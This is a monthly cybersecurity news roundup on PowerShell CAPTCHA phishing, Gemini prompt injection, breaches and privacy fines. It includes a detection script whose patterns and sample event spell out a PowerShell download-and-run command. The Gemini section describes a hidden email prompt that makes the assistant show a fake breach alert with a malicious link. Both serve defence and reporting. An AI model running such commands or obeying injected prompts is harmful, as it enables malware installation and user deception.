This month, the cybersecurity landscape has been particularly dynamic. From a novel phishing campaign targeting GitHub users with PowerShell to vulnerabilities in Google’s AI assistant, Gemini, the realm of cybersecurity continues to present new challenges. We also saw a significant cyberattack on Russia’s state media on Putin’s birthday and a major data breach at MoneyGram. Meanwhile, Meta faced a hefty fine for storing passwords in plain text, and former Kaspersky users were surprised by an unexpected software switch.

New/Improved Techniques

PowerShell Phishing

A recent phishing campaign has been targeting GitHub users with a novel approach that leverages PowerShell to download password-stealing malware. The phishing email, disguised as a security alert from GitHub, prompts users to verify their humanity by solving a CAPTCHA. This CAPTCHA, however, is a ruse that instructs users to press a series of keyboard keys, ultimately triggering a PowerShell command that downloads and executes a malicious file named “l6e.exe”.

The attack abuses a browser function that can interact with the system’s clipboard (the ‘copy’ function) to write attacker-controlled content into the clipboard. The fake CAPTCHA then directs the user through a series of keystrokes that ultimately open the Windows Run dialog, paste the clipboard content, and press Enter. The command pasted into Run invokes PowerShell to reach out to a malicious URL and install the malware.

The malware, identified as Lumma Stealer, is designed to steal credentials stored on the victim’s PC. While this specific campaign is unlikely to trick more experienced users, it poses a significant threat to less tech-savvy users who might not recognize the danger of executing such commands.
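A defender-side illustration of the chain described above, added here and not taken from the original post or any vendor analysis: the Run dialog opened with Win+R is spawned by explorer.exe, so PowerShell whose parent is explorer.exe and whose command line carries several download-cradle indicators is a useful hunting signal in process-creation telemetry. The sample events, their paths and the `example.invalid` URL are constructed for the demo.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    parent_image: str   # path of the parent process
    image: str          # path of the created process
    command_line: str

# One regex per download-and-run indicator. A single hit is common in
# legitimate admin use, so the rule below requires at least two of them.
CRADLE_PATTERNS = {
    "web_request": re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", re.I),
    "url": re.compile(r"https?://", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I),
    "invoke_expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "policy_bypass": re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass\b", re.I),
}

def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def cradle_indicators(command_line: str) -> list:
    return [name for name, rx in CRADLE_PATTERNS.items() if rx.search(command_line)]

def is_run_dialog_cradle(ev: ProcEvent, min_indicators: int = 2) -> bool:
    """PowerShell whose parent is explorer.exe (the Win+R Run box is spawned by
    the shell) and whose command line carries several cradle indicators."""
    if basename(ev.image) not in ("powershell.exe", "pwsh.exe"):
        return False
    if basename(ev.parent_image) != "explorer.exe":
        return False
    return len(cradle_indicators(ev.command_line)) >= min_indicators

# Constructed sample events; example.invalid is a reserved, non-routable name.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", PS,
              r'powershell -w hidden -c "iwr http://example.invalid/l6e.exe -OutFile $env:TEMP\l6e.exe"'),
    ProcEvent(r"C:\Windows\explorer.exe", PS, f'"{PS}"'),  # user simply opened a console
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Program Files\PowerShell\7\pwsh.exe",
              r"pwsh -ep bypass -File C:\scripts\deploy.ps1"),  # admin script, not from the shell
]

def flagged_events(events=SAMPLE_EVENTS) -> list:
    return [ev for ev in events if is_run_dialog_cradle(ev)]
```

Only the first constructed event is flagged; the threshold and pattern set are starting points to tune against your own baseline of legitimate PowerShell use.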

Google Gemini for Workspace: Prompt Injection

Recent investigations have revealed that Google’s Gemini for Workspace, an AI assistant integrated into various Google products, is vulnerable to indirect prompt injection attacks. These attacks allow malicious actors to manipulate the assistant into generating misleading or unintended responses, raising concerns about the reliability of the information produced by Gemini.

Researchers from HiddenLayer demonstrated that attackers could embed malicious prompts in emails or documents. When Gemini processes these prompts, it can produce responses that include fake alerts or instructions to visit malicious websites. In perhaps the most egregious example, the researchers were able to hide a prompt within an email, and when Gemini was asked to summarise the content of this email, it responded by following the malicious prompt and displaying a message to the user indicating that their account was breached – even including a malicious URL in the response that the user could follow to ‘reset their password’.

Despite these findings, Google has classified these vulnerabilities as “intended behaviours,” indicating that the company does not view them as security issues. However, the potential for misuse highlights the importance of vigilance when using AI-powered tools and the need for robust security measures to protect against such attacks.

Attacks / Threats

[RU] Hack Disrupts Russian State Media on Putin’s Birthday

A significant cyberattack attributed to a Ukrainian-linked hacker group, “sudo rm-RF,” has crippled the online operations of Russia’s state broadcaster VGTRK on Vladimir Putin’s 72nd birthday. This unprecedented attack disabled not only the broadcaster’s online services but also affected several internal functions. Kremlin spokesperson Dmitry Peskov confirmed the incident and stated that specialists are investigating the source of the attack.

While Kyiv has not officially claimed responsibility, a Ukrainian official hinted that the hackers executed a “large-scale attack” as a form of congratulation to Putin. Major channels, including Rossiya-1 and Rossiya-24, were impacted, with viewers receiving a “503 Service Unavailable” error message.

The attack comes amid heightened tensions in the ongoing Russia-Ukraine conflict, with Russian officials characterizing the incident as part of a broader “hybrid war” waged by the West. Maria Zakharova, spokesperson for the Russian foreign ministry, indicated that Russia plans to address this cyber incident in international forums.

[Global] MoneyGram Data Breach

MoneyGram, the second-largest global money transfer service, experienced a significant cyberattack that compromised sensitive customer data and led to a five-day outage as MoneyGram took its systems offline to mitigate the damage and investigate the incident. The outage disrupted transactions and caused significant inconvenience to customers worldwide.

MoneyGram has yet to disclose the exact number of affected individuals, but the impact is believed to be extensive given the company’s global reach. It is believed that the unauthorized third party gained access to MoneyGram’s network via social engineering, targeting the internal IT helpdesk by impersonating an employee. The malicious actor used their access to steal a variety of personal information, including names, bank account numbers, transaction details, contact information, dates of birth, Social Security numbers, and copies of government-issued IDs.

Initially, MoneyGram referred to the incident as a network outage, but later confirmed it was a cybersecurity issue. MoneyGram was fortunate in this instance: while a significant amount of data was exfiltrated, no signs of ransomware have been discovered on its systems. In response to the incident, MoneyGram has offered affected U.S. customers two years of free identity protection and credit monitoring services. The company has also advised customers to monitor their credit reports and account statements for any suspicious activity.

Naughty List

Meta Fined for Storing Passwords in Plain Text

Meta has been fined €91 million (approximately $102 million) by the Irish Data Protection Commission (DPC) for storing millions of Facebook and Instagram passwords in plain text. This significant fine follows a five-year investigation into a 2019 incident where Meta’s internal systems logged user passwords in a readable format.

The investigation revealed that these plaintext passwords were accessible to around 2,000 Meta engineers, who queried the database over 9 million times. Despite Meta’s assurances that there was no evidence of improper access or misuse of the passwords, the DPC concluded that Meta failed to implement adequate security measures to protect user data.

Passwords should never be stored (or logged) in a readable form. Storing them as salted cryptographic hashes means that even if the database is breached, an attacker does not obtain the passwords themselves and cannot reuse them for unauthorized access.
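As an added example (not from the original article), the salted hashing the paragraph recommends, using Python’s standard-library `hashlib.scrypt`: each password gets its own random salt, the work-factor parameters are stored alongside the digest so they can be raised later, and verification uses a constant-time comparison. The `USERS` table and the `login` helper are constructed for the demo.

```python
import base64
import hashlib
import hmac
import os

# scrypt work factors: N=2**14, r=8, p=1 costs roughly 16 MiB per hash, which is
# cheap for one login but expensive for an attacker trying billions of guesses.
SCRYPT_N, SCRYPT_R, SCRYPT_P, DKLEN = 2 ** 14, 8, 1, 32
ALGO = "scrypt"

def _b64(data: bytes) -> str:
    return base64.b64encode(data).decode("ascii")

def hash_password(password: str, salt: bytes = b"") -> str:
    """Return a self-describing record: algo$N$r$p$salt$digest (base64 parts).
    A fresh 16-byte random salt is drawn unless one is supplied (tests only)."""
    salt = salt or os.urandom(16)
    digest = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                            n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=DKLEN)
    return "$".join([ALGO, str(SCRYPT_N), str(SCRYPT_R), str(SCRYPT_P),
                     _b64(salt), _b64(digest)])

def verify_password(password: str, stored: str) -> bool:
    """Recompute with the parameters stored beside the digest and compare in
    constant time, so timing does not leak how many bytes matched."""
    try:
        algo, n, r, p, salt_b64, digest_b64 = stored.split("$")
    except ValueError:
        return False
    if algo != ALGO:
        return False
    expected = base64.b64decode(digest_b64)
    actual = hashlib.scrypt(password.encode("utf-8"), salt=base64.b64decode(salt_b64),
                            n=int(n), r=int(r), p=int(p), dklen=len(expected))
    return hmac.compare_digest(actual, expected)

# Constructed user store: the record reveals nothing about the password, and
# two users with the same password get different records thanks to the salt.
USERS = {
    "alice": hash_password("correct horse battery staple"),
    "bob": hash_password("correct horse battery staple"),
}
DUMMY = hash_password("no-such-user")  # keeps unknown-user checks equally slow

def login(username: str, password: str) -> bool:
    record = USERS.get(username)
    # Always run the full check so response time does not reveal whether
    # the username exists; the result is forced to False for unknown users.
    return verify_password(password, record or DUMMY) and record is not None
```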

Mozilla – Tracking Users Without Consent

European digital rights group NOYB (None Of Your Business) has lodged a privacy complaint with Austria’s data protection authority against Mozilla, claiming the company is improperly using a feature called “Privacy-Preserving Attribution” (PPA) to track users without their consent. Announced in February and automatically enabled in Firefox version 128, released in July of this year, PPA was intended to measure ad performance without collecting personal data. However, NOYB argues that the feature allows Mozilla to track user behaviour across websites, undermining user privacy.

NOYB asserts that Mozilla activated PPA by default without consulting users, effectively turning the browser into an ad measurement tool rather than empowering users to control tracking themselves. The group contends that while PPA may be less invasive than traditional cookie tracking, it still infringes on user rights under the EU’s General Data Protection Regulation (GDPR). Felix Mikolasch, a data protection lawyer at NOYB, criticized Mozilla for adopting a narrative that justifies user tracking, suggesting that PPA is merely a new method of monitoring rather than a true improvement in privacy.

Mozilla maintains that PPA does not involve sharing browsing data with third parties and emphasizes that advertisers receive only aggregated data about ad effectiveness. Users have the option to disable the PPA feature through the browser’s settings. A Mozilla spokesperson acknowledged the need for better engagement with external voices regarding online advertising and expressed a commitment to clarifying their approach moving forward.

Kaspersky Self-Removal Automatically Installs UltraAV

Former users of Kaspersky antivirus have expressed surprise and concern after the software reportedly deleted itself and installed UltraAV without prior warning. This change follows the U.S. government’s decision to add Kaspersky to its Entity List, banning the company from sales and software updates in the U.S. starting September 29, 2024. While Kaspersky claimed to have notified customers about the transition to UltraAV at the beginning of September, many users reported a lack of information regarding the timing and process of this switch.

User reactions on Kaspersky’s support forums and Reddit indicate that the automated installation of UltraAV was unexpected, with some users also finding UltraVPN installed alongside it. UltraAV, developed by the U.S.-based Pango Group, promises features like core malware protection, zero-day threat detection, and data theft protection. However, there is little information available about the antivirus’s performance, as user reviews are scarce and no independent testing results have been published yet.

As former Kaspersky users grapple with this unexpected transition, concerns about the effectiveness of UltraAV remain. PCMag’s Lead Analyst, Neil J. Rubenking, noted that users who relied on Kaspersky may rightfully question the quality of protection offered by UltraAV, especially with independent test scores yet to be released. As reviews are still forthcoming, the impact of this sudden change on users’ cybersecurity remains uncertain.

Joker’s Stash: Operator Indicted 3 Years After Takedown

The U.S. government has launched a significant crackdown on cybercrime, announcing sanctions and indictments against Timur Kamilevich Shakhmametov who allegedly operated Joker’s Stash, a notorious online marketplace for stolen payment cards. This platform, which operated since late 2014, was linked to major data breaches involving retailers like Saks Fifth Avenue and Hilton Hotels, affecting millions of consumers.

Joker’s Stash distinguished itself by offering a reliable source of stolen cards, claiming to sell only those directly obtained by its own hackers. The site catered to high-volume buyers, including street gangs, and provided incentives like loyalty programs and money-back guarantees. Shakhmametov, initially known as “v1pee,” had built a reputation on Russian hacking forums and participated in various high-stakes fraud schemes.

The DOJ estimates that Joker’s Stash generated revenues between $280 million and over $1 billion, reflecting the fluctuating prices of bitcoin and the volume of stolen goods sold. The site closed in January 2021 following law enforcement actions and health issues related to COVID-19. This indictment highlights the U.S. government’s ongoing efforts to combat cybercrime, and the challenges posed by evolving digital fraud enterprises.